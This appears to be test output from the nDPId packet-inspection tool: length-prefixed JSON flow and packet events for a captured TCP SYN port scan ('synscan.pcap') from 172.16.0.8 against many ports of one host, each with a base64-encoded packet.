-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1805,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":501,"source":"synscan.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAshVsAADgGixesEAAIQA2GNIzTBw3dU4MZAAAAAGACBAAtfwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8651,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":502,"source":"synscan.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs1uMAACsGRo+sEAAIQA2GNIzTIcvdU4MZAAAAAGACEAAGwQAAAgQFtA=="} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"synscan.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsgrAAADsGisKsEAAIQA2GNIzSAobdUoMYAAAAAGACEAAmCQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"synscan.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs298AADUGN5OsEAAIQA2GNIzSK2fdUoMYAAAAAGACCAAFKAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9944,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":505,"source":"synscan.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMQEAACkG7nGsEAAIQA2GNIzSJtjdUoMYAAAAAGACCAAJtwAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":506,"source":"synscan.pcap","alias":"nDPId-test","flow_id":500,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs4TUAACcGQD2sEAAIQA2GNIzSB0bdUoMYAAAAAGACEAAhSQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":507,"source":"synscan.pcap","alias":"nDPId-test","flow_id":501,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAssXUAADAGZv2sEAAIQA2GNIzSH6TdUoMYAAAAAGACBAAU6wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"synscan.pcap","alias":"nDPId-test","flow_id":502,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAscLcAACsGrLusEAAIQA2GNIzSHufdUoMYAAAAAGACEAAJqAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32780,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"synscan.pcap","alias":"nDPId-test","flow_id":503,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsNTUAADcG3D2sEAAIQA2GNIzSgAzdUoMYAAAAAGACEACoggAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"synscan.pcap","alias":"nDPId-test","flow_id":504,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/0EAADAGGTGsEAAIQA2GNIzSAKPdUoMYAAAAAGACBAAz7AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"synscan.pcap","alias":"nDPId-test","flow_id":505,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsMqQAACwG6c6sEAAIQA2GNIzSDOXdUoMYAAAAAGACBAAnqgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"synscan.pcap","alias":"nDPId-test","flow_id":506,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAsm\/MAACcGhX+sEAAIQA2GNIzSCJjdUoMYAAAAAGACEAAf9wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059221,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059221,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"synscan.pcap","alias":"nDPId-test","flow_id":507,"flow_packet_id":1,"flow_last_seen":1278275059221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059221,"pkt":"ACYLMQczACWzv5HuCABFAAAspNsAADoGaZesEAAIQA2GNIzSG57dUoMYAAAAAGACDAAQ8QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"synscan.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsU6cAACoGysusEAAIQA2GNIzSBCndUoMYAAAAAGACDAAoZgAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"synscan.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsZn8AAC4Gs\/OsEAAIQA2GNIzSgAjdUoMYAAAAAGACDACshgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsJZsAACUG\/desEAAIQA2GNIzSBOvdUoMYAAAAAGACCAArpAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9595,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"synscan.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsHDIAADEG+0CsEAAIQA2GNIzSJXvdUoMYAAAAAGACCAALFAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":35500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"synscan.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsglIAACkGnSCsEAAIQA2GNIzSiqzdUoMYAAAAAGACCACl4gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"synscan.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3cAADkGo\/usEAAIQA2GNIzSJ2LdUoMYAAAAAGACCAAJLQAAAgQFtA=="} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"synscan.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsBO4AADEGEoWsEAAIQA2GNIzSAAfdUoMYAAAAAGACCAAwiAAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"synscan.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsrgIAADEGaXCsEAAIQA2GNIzSB93dUoMYAAAAAGACCAAosgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":464,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"synscan.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsRe0AADIG0IWsEAAIQA2GNIzSAdDdUoMYAAAAAGACDAAqvwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAsQ5QAADgGzN6sEAAIQA2GNIzSF4ndUoMYAAAAAGACBAAdBgAAAgQFtA=="} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5730,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":524,"source":"synscan.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059280,"pkt":"ACYLMQczACWzv5HuCABFAAAswz8AACUGYDOsEAAIQA2GNIzSFmLdUoMYAAAAAGACCAAaLQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"synscan.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059280,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
